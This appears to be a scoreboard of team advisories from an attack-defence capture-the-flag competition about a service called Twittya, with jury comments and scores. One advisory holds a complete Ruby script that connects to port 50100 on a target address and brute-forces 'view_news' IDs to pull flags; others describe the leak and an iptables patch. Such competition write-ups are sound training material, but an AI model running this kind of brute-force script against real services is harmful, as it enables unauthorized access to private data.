|
Twittya Advisories
Service: | Twittya |
---|
Text: | the twittia service has an open port 50100 which is only required for local host (access from the lighthttp app). Deny it by using iptables
iptables -A INPUT --protocol tcp --dport 50100 -j DROP
iptables -I INPUT 1 -s 127.0.0.1 --protocol tcp --dport 50100 -j ACCEPT
|
---|
Jury comment: | Correct. To raise your score, provide an exploit, that gets flags. |
---|
Score: | 1/3 point |
---|
Service: | Twittya |
---|
Text: | news <number> <- in some cases you get list of numbers
view_news <number from the list>
you get a flag |
---|
Jury comment: | Patch? "in some cases" - in which cases? |
---|
Score: | 1/3 point |
---|
Service: | Twittya |
---|
Text: | exploit that will bruteforc the view_topics and grep for flags
require 'socket'
require 'timeout'
class Twittya
attr_accessor :sock
def connect(ip)
@sock=TCPSocket.new(ip,50100)
@ip=ip.to_s
end
def get_list(instr)
@sock.puts(instr)
users=[]
begin
Timeout.timeout(0.2) do
loop do
string= @sock.gets.strip
users<<string if string!="OK"
end
end
rescue
# puts $@,$!
end
return users.sort
end
def get_users()
get_list("users")
end
def view_news
last=0
begin
first=File.read(@ip).lines.first.strip.to_i;
rescue
puts $@,$!
first=65
end
puts "beginning with #{first}"
(first..first+20).each do |i|
get_list("view_news\n#{i}\n").each do |str|
if str=~/(\w{31}=)/
last=i
puts $1
File.open(@ip, 'w') {|f| f.write(i) }
end
end
end
end
end
t=Twittya.new
puts "pw0ning #{ARGV[0]}"
t.connect(ARGV[0])
t.view_news
|
---|
Jury comment: | Well done, but little bit late |
---|
Score: | 1/3 point |
---|
Service: | Twittya |
---|
Text: | You can go to 10.23.X.3:10050 with browser, create user, login there and go to "Subscriptions"
Then subscribe to any user by "Add user" and see the news of this user by pressing on their names on the left side. Flags lays there openly. |
---|
Jury comment: | Nice! Patch? |
---|
Score: | 2/3 points |
---|
|
|